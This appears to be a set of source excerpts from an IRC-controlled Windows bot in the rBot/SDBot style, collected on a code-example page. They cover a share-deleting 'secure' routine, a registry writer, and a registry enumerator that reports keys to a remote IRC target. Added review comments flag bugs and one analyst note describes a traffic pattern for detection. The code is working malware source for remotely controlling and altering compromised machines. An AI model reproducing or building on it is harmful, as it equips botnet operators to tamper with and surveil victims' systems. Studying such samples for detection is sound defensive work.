			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// Same key as above, opened a second time for the second value.
		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// NOTE(review): when NO_LSARESTRICT is defined, sendbuf is not
		// rewritten here, so the send after this block repeats the previous
		// message.
		#ifndef NO_LSARESTRICT
		DWORD dwRet;
		if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
			sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
		else
			sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
		#endif
	} else
		sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	#ifndef NO_NET
	// nonetapi32 is set elsewhere; when non-zero the share step is skipped.
	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;
 
		// Level-502 enumeration, repeated while the API reports more data.
		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;
 
				for(unsigned int i=1;i <= entriesread;i++) {
					// Only shares whose name ends in '$' are deleted.
					// NOTE(review): an empty share name would index at -1 here.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {	
						char* szShareName = new char[wcslen(p->shi502_netname)+1];
						// NOTE(review): sizeof(szShareName) is the size of a
						// char* (pointer size), not the length just allocated,
						// so the conversion is told the buffer is only
						// pointer-sized. Its result is also not checked, so
						// szShareName may be left unfilled before ShareDel.
						WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);

						if(ShareDel(NULL,szShareName) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
						else 
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);

						// NOTE(review): allocated with new[] but released with
						// scalar delete; the forms must match.
						delete szShareName;
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the fixed ShareList table.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { 
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
					else 
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				} 
			}
		} while (nStatus == ERROR_MORE_DATA);	
		sprintf(sendbuf,"[SECURE]: Network shares deleted.");
	} else
		sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);
	#endif

	return TRUE;
}
예제 #16
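// Create (or open) hKey\SubKey and, when KeyName is given, write one value.
//
// Type selects which member of Data is used:
//   REG_SZ / REG_EXPAND_SZ  Data.szQuery, written with its terminator
//   REG_DWORD               Data.dwQuery
//   REG_MULTI_SZ            Data.szQuery with '\n' separating the strings;
//                           the newlines become NULs and the block is
//                           double-NUL terminated. An empty string is written
//                           as zero bytes.
// String data is limited to 65535 characters. Returns TRUE when the key was
// created and (if requested) the value written; FALSE on any failure, on an
// unsupported Type, on a NULL string or on a string over the limit.
BOOL RegWrite(HKEY hKey,LPCTSTR SubKey,LPCTSTR KeyName,DWORD Type,RQUERY Data)
{
	HKEY	hRegKey;
	BOOL	bOk = FALSE;

	// Open the registry key, creating it if necessary
	if (fRegCreateKeyEx(hKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hRegKey,NULL) != ERROR_SUCCESS)
		return FALSE;

	// If no keyname then creating the key was all that was asked for
	if (KeyName == 0)
	{
		fRegCloseKey(hRegKey);
		return TRUE;
	}

	// Write the registry differently depending on type of variable we are writing
	switch (Type)
	{

	case REG_SZ:
	case REG_EXPAND_SZ:
		if (Data.szQuery)
		{
			// Enforce the 64Kb limit before anything is written; the data
			// needs no modification, so it is written from the caller's buffer.
			size_t nLen = strlen(Data.szQuery);
			if (nLen <= 65535)
				bOk = (fRegSetValueEx(hRegKey,KeyName,0,Type,(CONST BYTE *)Data.szQuery,(DWORD)nLen+1) == ERROR_SUCCESS);
		}
		break;

	case REG_DWORD:
		{
			DWORD dwBuf = Data.dwQuery;
			bOk = (fRegSetValueEx(hRegKey,KeyName,0,REG_DWORD,(CONST BYTE *)&dwBuf,sizeof(dwBuf)) == ERROR_SUCCESS);
		}
		break;

	case REG_MULTI_SZ:
		if (Data.szQuery)
		{
			// Only allow writing of 64Kb to a key, include space for double null
			char	szRegBuffer[65535+2];
			size_t	nLen = strlen(Data.szQuery);

			// The copy below was previously an unchecked strcpy into this
			// fixed buffer; reject anything that does not fit.
			if (nLen > 65535)
				break;

			memcpy(szRegBuffer,Data.szQuery,nLen);

			// Double null terminate, then change all \n to \0
			szRegBuffer[nLen]='\0';
			szRegBuffer[nLen+1]='\0';

			for (size_t i=0;i<nLen;++i)
				if (szRegBuffer[i]=='\n')
					szRegBuffer[i]='\0';

			// If blank then must use a size of 0, ignoring \0\0 (blank values not allowed)
			// Otherwise take our stringlen + 2 (double null) as the size
			DWORD dwBytes = (nLen != 0) ? (DWORD)nLen + 2 : 0;

			bOk = (fRegSetValueEx(hRegKey,KeyName,0,REG_MULTI_SZ,(CONST BYTE *)szRegBuffer,dwBytes) == ERROR_SUCCESS);
		}
		break;

	default:
		// Unsupported type: nothing is written
		break;

	}

	// Single exit so the handle is released on every path
	fRegCloseKey(hRegKey);
	return bOk;

}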
예제 #17
// Lists the contents of a registry key to a remote party over IRC.
// Opens root\subkey, then sends one irc->privmsg() line to `target` per subkey
// name and per value name (with the value's type as text from GetType(),
// defined elsewhere). `conn` is cast to IRC* without any check. Returns TRUE
// if at least one line was sent, FALSE if the key could not be opened or it
// produced no lines.
//
// Analyst note: only names and types are sent here, never value data. On the
// wire each entry is a numbered line of the form "(NN) <subkey>\<name>", which
// is the pattern to match in captured traffic.
BOOL RegQuery(HKEY root,LPCTSTR subkey,char *target,void *conn)
{
	IRC* irc=(IRC*)conn;
	HKEY key=NULL;
	DWORD dwRet; 
	DWORD cSubKeys=0;// number of subkeys 
	DWORD cValues;// number of values for key 
	DWORD dwMaxSubKey;// longest subkey size 
	DWORD dwMaxClass;// longest class string 
	DWORD dwMaxValue;// longest value name 
	DWORD dwMaxValueData;// longest value data 
	DWORD dwsd;// size of security descriptor 
	
	char szKeyName[MAX_KEY_LENGTH];
	DWORD dwKeySize=MAX_KEY_LENGTH;
	TCHAR  szValueName[MAX_VALUE_NAME];
	DWORD dwValueSize=MAX_VALUE_NAME;
	DWORD dwValueType;

	char szKeyClass[128];
	DWORD dwClassSize=sizeof(szKeyClass);
	
	FILETIME lpft;
	int i;
	int isent=0;	// number of lines sent; decides the return value
	//static char szRegBuffer[65535+2];
	//ZeroMemory(szRegBuffer,65535);
    
	// NOTE(review): KEY_ALL_ACCESS is requested although the key is only
	// enumerated below.
	if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
	{
		// Get the class name and the value count. 
		// NOTE(review): dwRet is not tested; if this call fails, cValues is
		// read below without ever having been initialised.
		dwRet=fRegQueryInfoKey(key,szKeyClass,&dwClassSize,NULL,&cSubKeys,&dwMaxSubKey,
			&dwMaxClass,&cValues,&dwMaxValue,&dwMaxValueData,&dwsd,&lpft);
		
		// Running line number shared by the subkey and value listings.
		int t=0;
		// Enumerate the subkeys
		if (cSubKeys)
		{
			//irc->privmsg(target,"%s Number of subkeys: %d",reg_title,cSubKeys);
			for (i=0; i<cSubKeys; i++,t++) 
			{ 
				// The name-length argument is in/out: reset it for every call.
				dwKeySize=MAX_KEY_LENGTH;
				dwRet=fRegEnumKeyEx(key,i,szKeyName,&dwKeySize,NULL,NULL,NULL,&lpft); 
				if (dwRet == ERROR_SUCCESS) 
				{
					irc->privmsg(target,"(%.2d) %s\\%s",t+1,subkey,szKeyName);
					isent++;
				}
			}
		} 

		
		// Enumerate the key values. 
		if (cValues) 
		{
			//irc->privmsg(target,"Number of values: %d",cValues);
			for (i=0, dwRet=ERROR_SUCCESS; i<cValues; i++,t++) 
			{
				// NOTE(review): the size is reset to MAX_KEY_LENGTH although
				// the buffer is szValueName[MAX_VALUE_NAME]; this is only safe
				// if MAX_KEY_LENGTH <= MAX_VALUE_NAME -- confirm against the
				// definitions.
				dwValueSize=MAX_KEY_LENGTH;
				szValueName[0] = '\0'; 
				dwRet=fRegEnumValue(key,i,szValueName,&dwValueSize,NULL,&dwValueType,NULL,NULL);
				if (dwRet == ERROR_SUCCESS) 
				{
					// The unnamed string value is shown as "(Default)".
					if (!strcmp(szValueName,"") && dwValueType==REG_SZ)
						sprintf(szValueName,"(Default)");
					irc->privmsg(target,"(%.2d) %s\\%s (%s)",t+1,subkey,szValueName,GetType(dwValueType));
					isent++;
				}
			}
		}

		fRegCloseKey(key);
	}
	else
		return FALSE;
	if (isent>0)
		return TRUE;
	return FALSE;
}